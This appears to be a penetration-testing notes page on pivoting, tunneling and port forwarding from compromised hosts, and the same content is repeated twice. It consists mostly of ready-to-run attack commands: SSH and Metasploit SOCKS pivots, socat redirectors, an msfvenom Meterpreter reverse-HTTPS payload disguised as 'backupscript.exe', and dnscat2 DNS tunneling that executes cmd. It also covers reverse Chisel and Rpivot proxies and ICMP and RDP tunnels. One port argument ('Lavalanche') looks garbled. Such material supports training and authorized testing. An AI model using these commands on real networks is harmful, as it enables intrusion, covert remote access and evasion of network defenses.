Pivoting, Tunneling, and Port Forwarding

Introduction

Pivoting is a technique that allows access to network segments beyond the initial compromised host. When valid credentials are obtained for a machine but the attack host cannot directly reach the target network, pivoting enables further exploration by routing traffic through the compromised system.
Before diving into the techniques, let’s define the core terms:
- Pivoting: Using a compromised host to access isolated networks, bypassing physical or virtual segmentation.
- Tunneling: Encapsulating network traffic within another protocol to route it through a pivot host.
- Port Forwarding: Redirecting traffic from one port to another, often used with tunneling to reach specific services.
A strong understanding of networking fundamentals (e.g., TCP/IP, routing, and firewalls) is essential for successful pivoting.

SSH Port Forwarding

SSH can be used for port forwarding, enabling both local and remote connections through a pivot host.

Local Port Forwarding

Local port forwarding lets you connect a port on your attack machine to a service on a remote network via an SSH session. It’s perfect when you know exactly which ports you need to hit.

ssh -L <Local-Port>:localhost:<Remote-Port> <Username>@<IP-Address>
Example: ssh -L 1234:localhost:3306 ubuntu@10.129.202.64

This forwards local port 1234 to the remote host’s port 3306. Multiple ports can be forwarded:

ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64

# Check using:
netstat -antp | grep 1234

Run commands:
nmap -v -sV -p1234 localhost

Dynamic Port Forwarding

Dynamic port forwarding creates a SOCKS proxy for flexible scanning when target ports are unknown. Start with:

ssh -D 9050 ubuntu@10.129.202.64

The -D flag enables a SOCKS listener on port 9050. Configure Proxychains by adding to /etc/proxychains.conf:socks4 127.0.0.1 9050
Run commands through Proxychains:

# Example:
proxychains nmap -v -sn 172.16.5.1-200

Note: Proxychains supports only full TCP connect scans (-sT), as it cannot handle partial packets.

Remote (Reverse) Port Forwarding

Remote port forwarding allows a remote host to connect back to the attack machine, useful for reverse shells. Use:

ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<IP-Address> -vN

The -vN flags enable verbose output and prevent a login shell. This forwards traffic from the pivot’s port 8080 to the attack host’s port 8000.

Meterpreter Tunneling & Port Forwarding

Meterpreter, part of Metasploit, supports pivoting without SSH. Set up a SOCKS proxy:

use auxiliary/server/socks_proxy
set SRVHOST 0.0.0.0
set SRVPORT 9050
set version 4a
run

# Remember to update proxychains config:
socks4 127.0.0.1 9050

# Then
use post/multi/manage/autoroute
set SESSION 1
set SUBNET 172.16.5.0
run

# Alternatively, from Meterpreter:
run autoroute -s 172.16.5.0/23

# List routes (To Check):
run autoroute -p

# Run commands using proxychains:
proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn

We can also do port forwarding using metasploit:

portfwd add -l 3300 -p 3389 -r 172.16.5.19

This forwards local port 3300 to the target’s port 3389. You can then RDP: xfreerdp /v:localhost:3300 /u:victor /p:pass@123
We can also do reverse portforwarding: portfwd add -R -l 8081 -p 1234 -L 10.10.14.18

Socat

Socat is a bidirectional relay tool for tunneling without SSH.

# Forward traffic:
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80

# Create a bind shell redirector:
socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443

# Generate a payload with msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=8080

Additional Tools

Plink.exe

Plink, part of PuTTY, enables SSH tunneling on Windows: plink -ssh -D 9050 ubuntu@10.129.15.50
Use Proxifier to route traffic through the SOCKS proxy.

Sshuttle

Sshuttle pivots over SSH without Proxychains: sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v

Rpivot

Rpivot creates a reverse SOCKS proxy. On the attack host: python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
Transfer Rpivot to the target: scp -r rpivot ubuntu@<IP-Address>:/home/ubuntu/
On the target: python2.7 client.py --server-ip 10.10.14.18 --server-port Lavalanche
Then run commands: curl --socks4 127.0.0.1:9050 172.16.5.135

Windows Netsh

Netsh configures port forwarding on Windows: netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.42.198 connectport=3389 connectaddress=172.16.5.25
You can verify using: netsh.exe interface portproxy show v4tov4

DNS Tunneling with Dnscat2

Dnscat2 tunnels data via DNS. On the attack host: sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache
On the target (Windows): Start-Dnscat2 -DNSserver 10.10.15.111 -Domain inlanefreight.local -PreSharedSecret <secret> -Exec cmd

SOCKS5 Tunneling with Chisel

Chisel tunnels TCP/UDP over HTTP. On the pivot target: ./chisel server -v -p 1234 --socks5
On the attack host: ./chisel client -v 10.129.202.64:1234 socks
Update /etc/proxychains.conf: socks5 127.0.0.1 1080
For reverse tunneling:

sudo ./chisel server --reverse -v -p 1234 --socks5
./chisel client -v 10.10.14.17:1234 R:socks

ICMP Tunneling with Ptunnel-ng

Ptunnel-ng uses ICMP for tunneling. On the pivot: sudo ./ptunnel-ng -r10.129.202.64 -R22
On the attack host: sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22
SSH through the tunnel: ssh -p2222 -lubuntu 127.0.0.1
For dynamic forwarding: ssh -D 9050 -p2222 -lubuntu 127.0.0.1

RDP Tunneling with SocksOverRDP

SocksOverRDP tunnels over RDP. Register the DLL: regsvr32.exe SocksOverRDP-Plugin.dll
Run SocksOverRDP-Server.exe on the target and configure Proxifier to forward traffic to 127.0.0.1:1080.

PreviousActive Directory Enumeration & Attacks (TBC)NextWeb Exploitation

Last updated 14 days ago

Pivoting, Tunneling, and Port Forwarding

Introduction

Pivoting is a technique that allows access to network segments beyond the initial compromised host. When valid credentials are obtained for a machine but the attack host cannot directly reach the target network, pivoting enables further exploration by routing traffic through the compromised system.
Before diving into the techniques, let’s define the core terms:
- Pivoting: Using a compromised host to access isolated networks, bypassing physical or virtual segmentation.
- Tunneling: Encapsulating network traffic within another protocol to route it through a pivot host.
- Port Forwarding: Redirecting traffic from one port to another, often used with tunneling to reach specific services.
A strong understanding of networking fundamentals (e.g., TCP/IP, routing, and firewalls) is essential for successful pivoting.

SSH Port Forwarding

SSH can be used for port forwarding, enabling both local and remote connections through a pivot host.

Local Port Forwarding

Local port forwarding lets you connect a port on your attack machine to a service on a remote network via an SSH session. It’s perfect when you know exactly which ports you need to hit.

ssh -L <Local-Port>:localhost:<Remote-Port> <Username>@<IP-Address>
Example: ssh -L 1234:localhost:3306 ubuntu@10.129.202.64

This forwards local port 1234 to the remote host’s port 3306. Multiple ports can be forwarded:

ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64

# Check using:
netstat -antp | grep 1234

Run commands:
nmap -v -sV -p1234 localhost

Dynamic Port Forwarding

Dynamic port forwarding creates a SOCKS proxy for flexible scanning when target ports are unknown. Start with:

ssh -D 9050 ubuntu@10.129.202.64

The -D flag enables a SOCKS listener on port 9050. Configure Proxychains by adding to /etc/proxychains.conf:socks4 127.0.0.1 9050
Run commands through Proxychains:

# Example:
proxychains nmap -v -sn 172.16.5.1-200

Note: Proxychains supports only full TCP connect scans (-sT), as it cannot handle partial packets.

Remote (Reverse) Port Forwarding

Remote port forwarding allows a remote host to connect back to the attack machine, useful for reverse shells. Use:

ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<IP-Address> -vN

The -vN flags enable verbose output and prevent a login shell. This forwards traffic from the pivot’s port 8080 to the attack host’s port 8000.

Meterpreter Tunneling & Port Forwarding

Meterpreter, part of Metasploit, supports pivoting without SSH. Set up a SOCKS proxy:

use auxiliary/server/socks_proxy
set SRVHOST 0.0.0.0
set SRVPORT 9050
set version 4a
run

# Remember to update proxychains config:
socks4 127.0.0.1 9050

# Then
use post/multi/manage/autoroute
set SESSION 1
set SUBNET 172.16.5.0
run

# Alternatively, from Meterpreter:
run autoroute -s 172.16.5.0/23

# List routes (To Check):
run autoroute -p

# Run commands using proxychains:
proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn

We can also do port forwarding using metasploit:

portfwd add -l 3300 -p 3389 -r 172.16.5.19

This forwards local port 3300 to the target’s port 3389. You can then RDP: xfreerdp /v:localhost:3300 /u:victor /p:pass@123
We can also do reverse portforwarding: portfwd add -R -l 8081 -p 1234 -L 10.10.14.18

Socat

Socat is a bidirectional relay tool for tunneling without SSH.

# Forward traffic:
socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80

# Create a bind shell redirector:
socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443

# Generate a payload with msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=8080

Additional Tools

Plink.exe

Plink, part of PuTTY, enables SSH tunneling on Windows: plink -ssh -D 9050 ubuntu@10.129.15.50
Use Proxifier to route traffic through the SOCKS proxy.

Sshuttle

Sshuttle pivots over SSH without Proxychains: sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v

Rpivot

Rpivot creates a reverse SOCKS proxy. On the attack host: python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
Transfer Rpivot to the target: scp -r rpivot ubuntu@<IP-Address>:/home/ubuntu/
On the target: python2.7 client.py --server-ip 10.10.14.18 --server-port Lavalanche
Then run commands: curl --socks4 127.0.0.1:9050 172.16.5.135

Windows Netsh

Netsh configures port forwarding on Windows: netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.42.198 connectport=3389 connectaddress=172.16.5.25
You can verify using: netsh.exe interface portproxy show v4tov4

DNS Tunneling with Dnscat2

Dnscat2 tunnels data via DNS. On the attack host: sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache
On the target (Windows): Start-Dnscat2 -DNSserver 10.10.15.111 -Domain inlanefreight.local -PreSharedSecret <secret> -Exec cmd

SOCKS5 Tunneling with Chisel

Chisel tunnels TCP/UDP over HTTP. On the pivot target: ./chisel server -v -p 1234 --socks5
On the attack host: ./chisel client -v 10.129.202.64:1234 socks
Update /etc/proxychains.conf: socks5 127.0.0.1 1080
For reverse tunneling:

sudo ./chisel server --reverse -v -p 1234 --socks5
./chisel client -v 10.10.14.17:1234 R:socks

ICMP Tunneling with Ptunnel-ng

Ptunnel-ng uses ICMP for tunneling. On the pivot: sudo ./ptunnel-ng -r10.129.202.64 -R22
On the attack host: sudo ./ptunnel-ng -p10.129.202.64 -l2222 -r10.129.202.64 -R22
SSH through the tunnel: ssh -p2222 -lubuntu 127.0.0.1
For dynamic forwarding: ssh -D 9050 -p2222 -lubuntu 127.0.0.1

RDP Tunneling with SocksOverRDP

SocksOverRDP tunnels over RDP. Register the DLL: regsvr32.exe SocksOverRDP-Plugin.dll
Run SocksOverRDP-Server.exe on the target and configure Proxifier to forward traffic to 127.0.0.1:1080.

PreviousActive Directory Enumeration & Attacks (TBC)NextWeb Exploitation

Last updated 14 days ago